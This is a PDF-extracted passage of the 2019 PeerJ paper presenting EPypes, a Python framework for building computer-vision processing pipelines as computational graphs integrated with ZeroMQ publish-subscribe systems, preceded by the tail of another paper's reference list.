Mumbai, India, 8–15 December 2012, pages 2519– 2534. Veselin Stoyanov, Nathan Gilbert, Claire Cardie, and Ellen Riloff. 2009. Conundrums in noun phrase coref- erence resolution: Making sense of the state-of-the- art. In Proceedings of the Joint Conference of the 47th Annual Meeting of the Association for Computational Linguistics and the 4th International Joint Conference on Natural Language Processing, Singapore, 2–7 Au- gust 2009, pages 656–664. Xu Sun, Takuya Matsuzaki, Daisuke Okanohara, and Jun’ichi Tsujii. 2009. Latent variable perceptron al- gorithm for structured classification. In Proceedings of the 21th International Joint Conference on Artificial Intelligence, Pasadena, Cal., 14–17 July 2009, pages 1236–1242. Marc Vilain, John Burger, John Aberdeen, Dennis Con- nolly, and Lynette Hirschman. 1995. A model- theoretic coreference scoring scheme. In Proceedings of the 6th Message Understanding Conference (MUC- 6), pages 45–52, San Mateo, Cal. Morgan Kaufmann. Xiaofeng Yang, Jian Su, Jun Lang, Chew Lim Tan, Ting Liu, and Sheng Li. 2008. An entity-mention model for coreference resolution with Inductive Logic Pro- gramming. In Proceedings of the 46th Annual Meeting of the Association for Computational Linguistics: Hu- man Language Technologies, Columbus, Ohio, 15–20 June 2008, pages 843–851. Chun-Nam John Yu and Thorsten Joachims. 2009. Learning structural SVMs with latent variables. In Proceedings of the 26th International Conference on Machine Learning, Montréal, Québec, Canada, 14–18 June 2009, pages 1169–1176. 418 work_6qacatlyhvbifcttz5bojghhhu ---- EPypes: a framework for building event-driven data processing pipelines EPypes: a framework for building event-driven data processing pipelines Oleksandr Semeniuta1 and Petter Falkman2 1 Department of Manufacturing and Civil Engineering, NTNU Norwegian University of Science and Technology, Gjøvik, Norway 2 Department of Electrical Engineering, Chalmers University of Technology, Gothenburg, Sweden ABSTRACT Many data processing systems are naturally modeled as pipelines, where data flows though a network of computational procedures. This representation is particularly suitable for computer vision algorithms, which in most cases possess complex logic and a big number of parameters to tune. In addition, online vision systems, such as those in the industrial automation context, have to communicate with other distributed nodes. When developing a vision system, one normally proceeds from ad hoc experimentation and prototyping to highly structured system integration. The early stages of this continuum are characterized with the challenges of developing a feasible algorithm, while the latter deal with composing the vision function with other components in a networked environment. In between, one strives to manage the complexity of the developed system, as well as to preserve existing knowledge. To tackle these challenges, this paper presents EPypes, an architecture and Python-based software framework for developing vision algorithms in a form of computational graphs and their integration with distributed systems based on publish-subscribe communication. EPypes facilitates flexibility of algorithm prototyping, as well as provides a structured approach to managing algorithm logic and exposing the developed pipelines as a part of online systems. Subjects Computer Vision, Data Science, Robotics, Software Engineering Keywords Computer vision, Computational graph, Publish-subscribe, Robotics, Python, Pipeline, Distributed systems, Algorithm development, Event-driven systems, Concurrency INTRODUCTION In recent years, the increased availability of computational resources, coupled with the advances in machine learning methods and ability to gather large amounts of data, opened new possibilities of developing more advanced data-driven systems. Visual data, acquired by various types of imaging equipment, constitutes one of the main inputs to advanced data analysis algorithms. In manufacturing automation, vision systems has a long history of use in combination with dedicated automated equipment and industrial robots, serving a role of contact-less sensing for, amongst others, quality inspection and robot guidance. What differentiates industrial vision solutions from general-purpose computer vision systems, is their coupling with the associated mechatronic components possessing an actuation function. This entails that most industrial vision systems operate in online mode, with their operation being synchronized with external systems by various forms of remote communication. How to cite this article Semeniuta O, Falkman P. 2019. EPypes: a framework for building event-driven data processing pipelines. PeerJ Comput. Sci. 5:e176 DOI 10.7717/peerj-cs.176 Submitted 31 August 2018 Accepted 22 January 2019 Published 11 February 2019 Corresponding author Oleksandr Semeniuta, oleksandr.semeniuta@ntnu.no Academic editor Mario Luca Bernardi Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.176 Copyright 2019 Semeniuta and Falkman Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.176 mailto:oleksandr.�semeniuta@�ntnu.�no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.176 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ When a new robotic system with vision sensing is developed, the early-stage system prototyping favors flexible tools and techniques that allow for iterating toward a functional solution quickly. When it comes to computer vision prototyping, the tools of the trade include OpenCV, as well as libraries from the Python data science ecosystem, most notably NumPy, SciPy, Pandas, Scikit-learn, Scikit-image, and others. Vision algorithm development is a challenging task in itself, as it requires a great deal of experimentation and tuning of numerous parameters and thresholds. Another challenge with early-stage prototyping of vision algorithms to be used with robotics and automation solutions is their coupling to other networked components. Establishing communication interfaces can be time consuming, and is often done as a patchwork, which is difficult to maintain. Many data processing systems can be logically modeled as direct graphs in which data is being gradually processed by the computational nodes. This is particularly characteristic of vision systems: after image capture and acquisition, an input image is obtained in memory and fed to a series of transformations leading to the application-specific output. Such pipeline can be comprised of the steps of image enhancement, image segmentation, and feature detection (Fig. 1). This idea has been formalized with the abstract concept of data flow, and has found its application in many areas, including distributed data processing, machine learning, embedded software development, and digital signal processing. MATLAB Simulink and LabVIEW are the traditional engineering tools whose programming model is based on data flow. In data engineering and data science areas, tools like Apache Storm, Apache Airflow, Luigi, and Dask employ explicit data flow construction and execution. Needless to mention that the deep learning libraries, such as TensorFlow, Caffe, and Theano, construct and train models as directed acyclic graphs (DAGs). This paper tackles the problems of both (1) vision algorithms development and (2) their integration into distributed environments. This is done by introducing EPypes, a Python library1 for construction and execution of computational graphs, with the built-in capability of exposing the graphs as reactive pipelines. The latter are intended to be a part of publish-subscribe systems. In addition to the software tools, this paper presents a system development method that facilitates transition from ad hoc prototyping phase to well-structured system integration phase without compromising the developers’ flexibility. Image enhancement Original image Image segmentation Enhanced image Feature detection 1 or more regions or contours Features or/and other measurements External systemsProcess/scene Image acquisition Figure 1 Common steps of a vision pipeline. Full-size DOI: 10.7717/peerj-cs.176/fig-1 1 The EPypes implementation is available under the 3-clause BSD license at https://github.com/semeniuta/EPypes. Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 2/20 http://dx.doi.org/10.7717/peerj-cs.176/fig-1 https://github.com/semeniuta/EPypes http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ The practical applicability of the proposed framework is validated in a distributed experimental setup comprised of a robot, an image acquisition service, and an image processing component, communicating in a publish-subscribe manner using ZeroMQ middleware. It is shown that the EPypes architecture facilitates seamless transition between various deployment configurations in a distributed computing environment. This paper is structured as follows. First, the background areas are introduced, including overview of computational systems based on DAGs, the Python data science/computer vision ecosystem, and event-based middleware. Further, the EPypes abstractions are presented with code examples and architectural relationships. Finally, a distributed system experiment based on EPypes provides a more detailed view into the runtime properties of the framework. BACKGROUND Graph-based representation of computational systems A wide range of computational systems, particularly those with streaming behavior, can be represented as directed graphs, in which data is routed through processing nodes. Not only is this representation accessible to human understanding (particularly for engineers), but it also has been used in various settings to realize improvement of the function of the systems. Control engineering and signal processings has a long tradition of graphically modeling systems in a form of block diagrams. MATLAB Simulink and LabVIEW are widely used in this context as engineering tools with formally defined abstractions. The field of cyber- physical systems (CPS) makes great use of graph-based system models together with the associated models of computations (Lee & Seshia, 2011). A notable CPS modeling environment is Ptolemy II. In computer science, graph-based representation of systems has been used for a range of different purposes: data flow models, task graphs (for parallel processing scheduling), symbolic representation of computational expressions (for machine learning and automatic computation of gradients), representation of concurrent process networks (e.g., Communicating Sequential Processes), workflow languages, etc. In the software engineering community, the pipes and filters architecture applies the same ideas to data processing systems design and development. The well-known pipes mechanism of Unix-like operating systems has proved to be particularly powerful when it comes to composition of multiple tools to solve a complex task. Data science has seen a surge of tools based on explicit handling of data processing systems in a form of DAG. Many of them are intended to be run on a computing cluster, and the DAG architecture in this case facilitates scheduling of parallel execution of data processing tasks. Apache Storm is a cluster-based stream processing engine. Apache Airflow is workflow management platform for batch processing on a cluster. Dask is a Python parallelization library that utilizes DAG modeling for scaling algorithms written with NumPy and Pandas primitives to be used with massive datasets. Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 3/20 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ Python data science/computer vision ecosystem The open source movement has gained a big popularity within the fields of data science, computer vision, and robotics in recent years. Even though the established proprietary engineering tools are pervasive in the industrial context, they often lack flexibility and hinder a deeper understanding of how a system functions. Conversely, open source tools provide community-contributed implementation of common functionality, which is flexible to use and allows for building more scalable and reproducible solutions. In computer vision, the OpenCV library has become a de-facto standard providing a pool of community-contributed image processing and computer vision algorithms. Similarly, the point cloud library (PCL) provides open-source routines for point clouds processing. A multitude of tools from the Python ecosystem are widely used for data science and scientific computing. They are built upon the NumPy array library, and include Pandas, Scikit-learn, Scikit-image, and many others. The abovementioned OpenCV and PCL, as well as many other low-level tools, expose Python bindings, which makes it possible to perform rapid system developed with preserved high performance of the applied algorithms. Events and publish-subscribe middleware An event-driven system is characterized by a discrete state space, where state transition happen on occurrence of events at sporadic time instants (Cassandras & Lafortune, 2008). In distributed systems, events are often embodied as messages sent over a network in a publish-subscribe communication system. Such messages can signalize a change of a system state (change event) or a notification from an observation (status event), expressed as a tuple with a timestamp and an application-specific descriptive parameters (Hinze, Sachs & Buchmann, 2009). Message-based middleware provides a unified set of communication and input/output capabilities in such sense-respond systems. Middleware allows to decouple the communicating components by introducing message queuing, built-in address resolution (e.g., via handling logical addresses such as topic names), and usage of a common data serialization format (Magnoni, 2015). The defining components of a particular middleware solution are the communication protocol (transport-level TCP and UDP, wire-level AMQP, ZeroMQ/ZMTP, MQTT), the communication styles (request/reply, publish/subscribe), and the data serialization method (typically realized with an interface definition language like Protobuf or Apache Thrift). Many middleware solutions are based on a central broker, for example, ActiveMQ and RabbitMQ. The additional hop through the broker adds a constant value to the communication latency (Dworak et al., 2012). ZeroMQ is an example of broker-less middleware, in which the message queuing logic runs locally within each communicating component (ZeroMQ, 2008). EPYPES EPypes is a Python-based software framework that combines pipes and filters and publish-subscribe architectures. It allows to develop data processing pipelines, the behavior of which is defined by their response to events. EPypes defines a computational graph, which is Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 4/20 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ a static data structure modeling a data processing algorithm, abstractions used for execution of computational graphs, and a hierarchy of pipelines, which extend the algorithm logic defined with computational graphs to be a part of a publish-subscribe system. Computational graph At the core of EPypes lies CompGraph, a data structure that models a data processing algorithm as a computational graph, that is, as a network of functions and data tokens. Formally, a CompGraph can be described as a bipartite DAG G: G ¼ ðF; T; EÞ where F is a set of functions, T is a set of data tokens, and E is a set of directed edges between functions and tokens and vice-versa. The latter implies that edges of only the following two kinds are permitted: (f, ti), where f ∈ F, ti ∈ T, and (tj, g), where g ∈ F, tj ∈ T. A function f ∈ F is associated with a Python callable. A token t ∈ T represents a data object of an arbitrary type. If function f correspond to a callable with m input parameters and n outputs, it has to be connected to n input and m output tokens. Let Inf � T denote the set of input tokens to f, and Outf � T denote the set of output tokens from f. Functions in G are uniquely identified by their string-based names. This allows to use the same Python callable several times in the computational graph. Once a computational graph G is constructed, and it conforms to the requirements of acyclicity, its execution can be scheduled. Topological sort of G results in an order of vertices (functions and tokens) so that all the directed edges point from a vertex earlier in the order to a vertex later in the order. With invoking functions in this topological order, all the precedence constraints will be satisfied. For many computational procedures, one can typically distinguish between parameters carrying the primary data entities and parameters that tune the procedure. In this paper, the former are referred to as payload parameters, and the latter as hyperparameters2. Thus, tokens belonging to these two parameter sets of function f form the input parameter set of f: Inf = Pf ∪ Hf. It is further presumed that all hyperparameter tokens are frozen, that is, given fixed values, during the construction of graph G. The set of non-frozen source tokens is referred to as free source tokens, and is used to provide input to the computational graph. In the computational graph example shown in Fig. 2, rectangle vertices represent functions in the function set F = {f1, f2, f3}, white circular vertices represent payload tokens, and gray circular vertices—hyperparameter tokens. In accordance with the previously defined notation, each function in F has the following associated token sets: f1 Hf1 ¼ ft2; t3g Pf1 ¼ ft1g Outf1 ¼ ft4; t5g f2 Hf2 ¼ [ Pf2 ¼ ft4g Outf2 ¼ ft6g f3 Hf3 ¼ ft7g Pf3 ¼ ft5; t6g Outf3 ¼ ft8g Token t1 is the only free source token, and its value is required to perform a computation. 2 The term hyperparameters is borrowed from machine learning, where it refers to parameters that characterize a particular algorithm, as opposed to model para- meters. Semantics of hyperparameter tokens in this paper is similar, although the considered computational graphs can be used to model a wide variety of algorithms. Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 5/20 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ A concrete example Consider a simple computational graph that defines a processing chain in which a color image is first converted to grayscale, then blurred with a Gaussian kernel, with the blurred image further used to perform edge detection with the Canny algorithm. The following listing shows the steps of the computational graph construction. importimport cv2 defdef grayscale (im): returnreturn cv2.cvtColor(im, cv2.COLOR_BGR2GRAY) defdef gaussian_blur(img,kernel_size): returnreturn cv2.GaussianBlur(img, (kernel_size, kernel_size), 0) func_dict = { ‘grayscale’: grayscale, ‘canny’: cv2.Canny, ‘blur’: gaussian_blur } func_io = { ‘grayscale’: (‘image,’ ‘image_gray’), ‘blur’: ((‘image_gray,’ ‘blur_kernel’),’image_blurred’), ‘canny’:((‘image_blurred,’’canny_lo,’ ‘canny_hi’), ‘edges’), } cg = CompGraph(func_dict, func_io) After importing the OpenCV Python module (cv2), two helper functions are defined for grayscaling and blurring (the function for edge detection is used as-is). The structure of the computational graph is specified as two dictionaries. The func_dict dictionary defines mapping from unique function identifiers (in this case, strings “grayscale”, “blur”, “canny”) to the respective callable objects. The func_io Figure 2 An example abstract computational graph. Full-size DOI: 10.7717/peerj-cs.176/fig-2 Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 6/20 http://dx.doi.org/10.7717/peerj-cs.176/fig-2 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ dictionary defines input/output relationships between the functions in a form of tokens. Each function identifier is mapped to a tuple describing input and output tokens that can be one of the following forms, depending on the respective functions’ signatures: � (x, y) for single input and single output; � ((x1, ..., xm), y) for multiple inputs and single output; � (x, (y1, ..., yn)) for single input and multiple outputs; � ((x1, ..., xm), (y1, ..., yn)) for multiple inputs and multiple outputs. An instance of CompGraph is then constructed based on func_dict and func_io. To be executable, a computational graph has to be supplied to the constructor of CompGraphRunner. The latter is used to store the hyperparameter tokens and schedule execution of the graph with the topological sort. Internally CompGraphRunner delegates storage and retrieval of token data to an instance of TokenManager (Fig. 3). In the following example, we specify the Gaussian blur kernel, and low/high threshold of the Canny algorithm in dictionary params. The latter, together with the original computational graph cg is used to construct a CompGraphRunner: hparams = { ‘blur_kernel’: 11, ‘canny_lo’: 70, ‘canny_hi’: 200 } runner = CompGraphRunner(cg, hparams) Visualization of this parametrized computational graph is shown in Fig. 4. The hyperparameter tokens are highlighted in gray. To run a CompGraphRunner, its run method is invoked with keyword arguments corresponding to names and values of free source tokens. In the provided example the only free source token is image. Therefore, the running syntax is the following: im = cv2.imread(‘image.jpg,’cv2.IMREAD_COLOR) runner.run(image=im) A CompGraphRunner can be used as a namespace for accessing any token value by the token key. The interface for this operation is the same as for a Python dictionary. CompGraphRunnerCompGraph BipartiteDigraph TokenManager Figure 3 Class digram of EPypes abstractions dealing with computational graphs. Full-size DOI: 10.7717/peerj-cs.176/fig-3 Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 7/20 http://dx.doi.org/10.7717/peerj-cs.176/fig-3 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ For example, to visualize the blurred image from the computational graph in Fig. 4 using Matplotlib, the following syntax is applied: plt.imshow(runner[‘image_blurred’]) Pipelines To introduce additional functionality to algorithms expressed as computational graphs and transform them into runtime reactive components, a hierarchy of pipeline classes is defined. As shown in Fig. 5, the basic building block of EPypes pipelines is a Node, which is a runtime counterpart to a function. An instance of Node based on function f can be invoked as a callable object, with parameter values corresponding to the positional input arguments of f. A network of node instances corresponding to the graph G form a NodeBasedCompGraph. The latter constitutes the main component of a Pipeline, as well as its subclasses (SourcePipeline, SinkPipeline, and FullPipeline). An instance of the Pipeline class is constructed similarly to the earlier example of CompGraphRunner, but with the additional name argument: pipe = Pipeline(‘MyPipeline’, cg, hparams) Because Pipeline is defined as a subclass of Node, its instances constitute callable objects, and are functionally equivalent to instances of Node. The whole pipeline is orchestrated by an instance of CompGraphRunner (Fig. 5). The internal structure of a Pipeline is visualized in Fig. 6. grayscale image_gray blur image_blurred canny edges canny_hi image blur_kernel canny_lo Figure 4 Computational graph for edge detection. Full-size DOI: 10.7717/peerj-cs.176/fig-4 Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 8/20 http://dx.doi.org/10.7717/peerj-cs.176/fig-4 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ Additional capabilities of a Pipeline, as compared with a raw CompGraphRunner, include time measurement of nodes’ durations, computation of computational graph overhead, storage of additional attributes, and other functionality added by subclassing Pipeline. To allow for reactive behavior of pipelines, they are combined with event queues, which can be used for subscription to triggering events and publishing the results of data processing. To realize this, aside from Pipeline, which is not reactive, three other types of pipelines, coupled with event queues, are defined. Reactive pipelines operate in context of thread-based concurrency with blocking queues as the synchronization mechanism. In the Python standard library, a queue.Queue object can be used to communicate between two threads: the producer thread puts an object on the queue, and the consumer thread request the object and blocks until the latter becomes available. The principle of such interaction is shown in a sequence diagram in Fig. 7. A SourcePipeline, see Fig. 8, is a subclass of Pipeline whose final output is put to the output queue qout. A SourcePipeline is in addition parametrized by fout, an output preparation function, responsible for packaging the chosen data from the pipeline tokens into a single message that gets published on qout. An instance of SourcePipeline is constructed as follows: src_pipe = SourcePipeline(‘MySourcePipeline’, cg, q_out, f_out, hparams) Node Pipeline SourcePipeline SinkPipeline FullPipeline EventLoop CompGraphRunnerNodeBasedCompGraph CompGraph Figure 5 Class digram of EPypes PipelinesPipelines. Full-size DOI: 10.7717/peerj-cs.176/fig-5 CompGraphRunner f1 f2t1 t4 t5 f3t6 t8 t7t3t2 �in TokenManager Figure 6 Structure of an instance of PipelinePipeline. Full-size DOI: 10.7717/peerj-cs.176/fig-6 Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 9/20 http://dx.doi.org/10.7717/peerj-cs.176/fig-5 http://dx.doi.org/10.7717/peerj-cs.176/fig-6 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ As an example of the output preparation function, consider a pipeline, whose computational graph contains a token with the key pose, corresponding to a 3D pose estimated from images. To take the data corresponding to this token and package it as a Python pickle, the following function can be defined: defdef prepare_output(pipe): pose = pipe[‘pose’] wire_data = pickle.dumps(pose) returnreturn wire_data Another subclass of Pipeline is SinkPipeline, shown in Fig. 9. It is meant not to be called manually, but to be triggered as an event e is announced in qin. Because e can be an arbitrary object, it is necessary to map its contents to a dictionary de that describes what data should correspond to the pipeline’s free source tokens. Such mapping is defined by event dispatcher function fin. An instance of SinkPipeline is constructed in a familiar way: snk_pipe = SinkPipeline(‘MySinkPipeline’, cg, q_in, f_in, hparams) The idea of event dispatcher can be illustrated by referring to the computational graph in the earlier example (Fig. 4). Consider that e constitutes an image as a numpy.ndarray. Because a CompGraphRunner is invoked with keyword arguments, fin is defined to map to the required kwargs dictionary: defdef dispatch_image(im): returnreturn {‘image’: im} Producer Queue Consumer get event get put Figure 7 Sequence diagram of thread-based producer and consumer interacting through a queue. Full-size DOI: 10.7717/peerj-cs.176/fig-7 qout put in CompGraphRunner TokenManager �out f1 f2t1 t4 t5 f3t6 t8 t7t3t2 Figure 8 Structure of an instance of SourcePipelineSourcePipeline. Full-size DOI: 10.7717/peerj-cs.176/fig-8 Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 10/20 http://dx.doi.org/10.7717/peerj-cs.176/fig-7 http://dx.doi.org/10.7717/peerj-cs.176/fig-8 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ The behavior of waiting for an event is realized with an event loop, an instance of EventLoop class, which is continuously run in a separate thread of execution. It monitors qin, and, as a new event e becomes available, invokes the associated instance of SinkPipeline (Fig. 9) having the kwargs from the event dispatcher: input_kwargs = self._event_dispatcher(event) self._callback_pipeline.run(��input_kwargs) Finally, the most comprehensive EPypes entity is FullPipeline, shown in Fig. 10. It subclasses Pipeline, and provides functionality of both reacting to a stream of incoming events in qin and publishing a subset of its processing results to qout as outgoing events. It is instantiated in the following way: snk_pipe = FullPipeline(‘MyFullPipeline’, cg, q_in, q_out, f_in, f_out, hparams) EPypes-based system development A distinction between a static computational graph and its runtime counterparts is realized in order to facilitate smooth system evolution from an early ad hoc development phase to a more integral whole with well-functioning reactive behavior. As shown in Fig. 11, the development starts with components having less structure, and proceeds by extension of these components with functionality and behavior that are facilitated by the proposed tools. In the early development phase, vision algorithms, as well as other data processing routines, are prototyped using the available tool set: different alternatives can be implemented and evaluated in an interactive manner using tools like Jupyter and supported by OpenCV and a pool of scientific Python libraries (NumPy, Pandas, Scikit-image, Scikit-learn). As the result of prototyping, a collection of well-tested functions is developed. At this stage, the developer can specify computational graphs from the pool of these functions. qin get� CompGraphRunner � EL TokenManager�in f1 f2t1 t4 t5 f3t6 t8 t7t3t2 Figure 9 Structure of an instance of SinkPipelineSinkPipeline.. Full-size DOI: 10.7717/peerj-cs.176/fig-9 qout put �out qin get� CompGraphRunner � EL TokenManager�in f1 f2t1 t4 t5 f3t6 t8 t7t3t2 Figure 10 Structure of an instance of FullPipelineFullPipeline.. Full-size DOI: 10.7717/peerj-cs.176/fig-10 Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 11/20 http://dx.doi.org/10.7717/peerj-cs.176/fig-9 http://dx.doi.org/10.7717/peerj-cs.176/fig-10 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ The process of computational graph engineering involves a great deal of prototyping itself. Despite the fact that CompGraph constitutes a highly-structured entity, the flexibility of its definition brings a number of advantages over coding up the algorithm as a single function. Most importantly, the flat structure of the computational graph, along with Graphviz-based visualization capabilities, gives a transparent view on the data flow in the developed algorithm. It also allows for incorporating several alternative branches as a part of the same graph. The uniquely-named tokens provide an isolated namespace, which is specifically useful when prototyping in a Jupyter notebook. The mechanism of hyperparameter tokens allows for systematic management of the set of thresholds and other configuration values while being on a single hierarchical level (without a cascade of function calls). The well-defined structure of a computational graph facilitates automated manipulation of it, for example, extending the original graph with additional functions, union of two or more graphs, and union with renaming of functions and tokens. When a computational graph is developed, it can be used to construct pipelines. The non-reactive Pipeline provides additional capabilities to the computational graph: it is runnable, includes time measurement functionality, and can be flexibly subclassed, as done in reactive pipelines (SinkPipeline, SourcePipeline, and FullPipeline). The latter are used to expose the developed algorithm in online mode. EPypes use case In order to illustrate practical application of the EPypes framework and show its suitability for building data processing components in distributed environments, this section presents a run time use case scenario with the associated experiment. The presented scenario demonstrates how EPypes can be deployed as a part of a real distributed system (with the communication based on ZeroMQ and Protobuf) and what timing properties may be expected in this case. In particular, a major concern is how much overhead is introduced by the additional abstractions in the EPypes architecture. Furthermore, it is of interest how repeatable this overhead is, as well as what role it plays comparing to communication latency and the application-specific processing time. Rough prototyping (Jupyter notebooks, simple scripts etc.) Tested and documented procedures (Python functions and classes) Computational graphs (CompGraph, CompGraphRunner, TokenManager) Non-reactive components (Node, Pipeline) Reactive components (SourcePipeline, SinkPipeline, FullPipeline) Customized components (custom nodes, pipelines, middleware adapters) T o w a rd s m o re s tr u ct u re a n d r e a ct iv ity Figure 11 Layered system development framework. Full-size DOI: 10.7717/peerj-cs.176/fig-11 Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 12/20 http://dx.doi.org/10.7717/peerj-cs.176/fig-11 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ System description As shown in Fig. 12, the case system is comprised of three nodes: (1) the robot control node, (2) the image acquisition service, and (3) the EPypes-based image processing node. The robot control node coordinates the robot’s work cycle and realizes communication with external systems. The system performing stereo acquisition from two cameras is designed as a streaming service, built using the FxIS framework (Semeniuta & Falkman, 2018). For each associated camera, a stream of images is captured in its own thread of execution, and a number of recent frames are retained at each moment. External systems can request images from the service that closely correspond to the request timestamp. The nodes run in the distributed environment and communicate through ZeroMQ publish/subscribe sockets and in-process blocking queues. For publishing and subscribing, EPypes provides two thread-based abstractions, namely ZMQPublisher and ZMQSubscriber. The former encapsulates a ZeroMQ PUB socket and acts as a consumer of an in-process queue: as a new data is available on the queue, it gets published. An example in Fig. 12 is the PUB2/qout pair. ZMQSubscriber encapsulates a ZeroMQ SUB socket, which is polled with the Poller object. On arrival of a new message, the latter is put on the connected in-process queue. An example in Fig. 12 is the SUB1/qin pair The robot control node runs on an ARM-based Raspberry Pi 3 single-board computer with the Raspbian operating system, while the vision-related components are deployed to an Ubuntu-based x86-64 machine. The latter has an Ethernet connection to a stereo camera pair (GigE Vision-based Prosilica GC1350), which are used by the image acquisition node. The following communication loop is considered: 1. Robot announces request for timely image processing results; the image request is announced asynchronously as an event at PUB1. 2. Images most closely associated with the request are acquired and, as a tuple of numpy. ndarray, communicated to the processing component via the common in-process queue qimages. 3. Image processing node extracts the desired features from the images, which are communicated back to the robot via the PUB2/SUB2 asynchronous socket pair. Robot control node PUB1 SUB1 PUB2 SUB2 Image acquisi�on service qin …qimages qout Figure 12 System configuration. Full-size DOI: 10.7717/peerj-cs.176/fig-12 Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 13/20 http://dx.doi.org/10.7717/peerj-cs.176/fig-12 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ The target vision algorithm performs ORB feature detection, description, and matching (Rublee & Bradski, 2011). Figure 13 shows the corresponding computational graph. After image features are identified in each image, collections of feature descriptors are matched against each other using OpenCV’s BFMatcher object, with the matches returned in sorted order by match distance. The final gather_keypoints function produces an array of the matched keypoints’ coordinates. The communicated messages that are send over wire are serialized in the Google’s Protocol Buffers (Protobuf) interchange format. Three message types are used: � AttributeList represents a collection of key/value attributes, where an attribute can be either a string, a double, or an int32. � Event, sent over PUB1/SUB1, is comprised of an id (string), a type (string), and attributes (AttributeList); � JustBytes, sent over PUB2/SUB2, is comprised of an id (string), content (bytes), and attributes (AttributeList); The computational graph shown in Fig. 13 forms a basis for an instance of a FullPipeline. Its event dispatcher fin handles tuples with pairs of images put onto qimages. The output preparation function fout is responsible for packaging the output data as a JustBytes Protobuf message, with its content being the Pickle-serialized value of the first 20 rows of the keypoints_paired token (numpy.ndarray), and the attributes filled by timestamps and durations captured with the image acquisition service and the EPypes pipeline. Time measurement experiment The robot control node announces a series of vision requests and extracts attributes from the response Protobuf messages. In addition, it records the timestamps of when the vision request get announced (tvreq) and when the corresponding response is obtained (tvresp). detect_and_describe_features_1 keypoints_1 descriptors_1 gather_keypoints match keypoints_paired matches detect_and_describe_features_2 keypoints_2 descriptors_2 mask_1 WTA_KfastThreshold nfeatures edgeThreshold crossCheck image_1 nlevels image_2scaleFactor mask_2scoreType normType patchSize Figure 13 ORB computational graph. Full-size DOI: 10.7717/peerj-cs.176/fig-13 Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 14/20 http://dx.doi.org/10.7717/peerj-cs.176/fig-13 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ The difference between these timestamps accounts for the trip duration of the current request: ttrip ¼ tvresp � tvreq For execution of both the image acquisition service and the vision pipeline, two timestamps are added to the properties set: treact, when the component reacted to the incoming event, and tpub, right before publishing the outgoing event. Their difference tr!p provides the measurement of the component’s processing time, including processing of incoming and outgoing events: tr!p ¼ tpub � treact Properties related to the vision pipeline that get added to the outgoing Protobuf message comprise vision processing time sp, overhead from orchestrating the computational graph ocg, and timestamps of start and finish of the event dispatcher fin tfin"; tfin# � � and the output preparation function fout tfout"; tfout# � � , which define the corresponding function durations: sfin ¼ tfin# � tfin" sfout ¼ tfout# � tfout" Computational graph overhead ocg is measured internally by the pipeline (p.compute_overhead()), and constitutes the difference between total processing time of the pipeline and the sum of processing times of all the enclosed nodes: ocg ¼ sp � � X fsn for each node n 2 pg After each request is finished, the robot control node records all the obtained properties. The latter are further aggregated in a Pandas data frame, with a row of properties’ values per each request. From the available data, the following overhead metrics can be computed: 1. Network overhead measures how much the trip duration is greater than the time spent in all the components: onetwork ¼ strip � ðtðimage acquistitionÞr!p þ tðvision pipelineÞr!p Þ 2. EPypes overhead is computed as an excess time in the vision pipeline in addition to the processing in the computational graph and in the functions fin and fout: oepypes ¼ sðvision pipelineÞr!p � ðsp þ sfin þ sfoutÞ Figure 14 demonstrates the timeline of 100 vision requests and the associated durations of the image acquisition service, the vision pipeline, and the overhead from network communication. Data has been collected from five experiments, each with 500 vision requests. For each experiment, a maximum likelihood estimation of log-normal probability density function is performed for distributions of ocg and oepypes. The same estimation is performed for all data combined. Figures 15 and 16 show visualization of these PDFs. A PDF for each individual experiment is visualized as a shaded area under the curve. The PDF for all data is shown as a thick curve. The thin vertical line specify the Semeniuta and Falkman (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.176 15/20 http://dx.doi.org/10.7717/peerj-cs.176 https://peerj.com/computer-science/ modal value of the PDF for the combined dataset, and the enclosing thick vertical lines delimit the overall range of measurements for the combined dataset. It can be seen from Fig. 15 that overhead from performing data processing based on a computational graph ocg is characterized by matching log-normal distributions for every experiment, with most of the probability density located around 0.3 ms. The EPypes overhead oepypes, as shown in Fig. 16, has much tighter range of possible values, distributed log-normally with matching distributions for every experiment, and with most of the probability density around 0.02 ms. Overall, for a vision algorithm that naturally requires tens of milliseconds to perform the processing, the overheads introduces 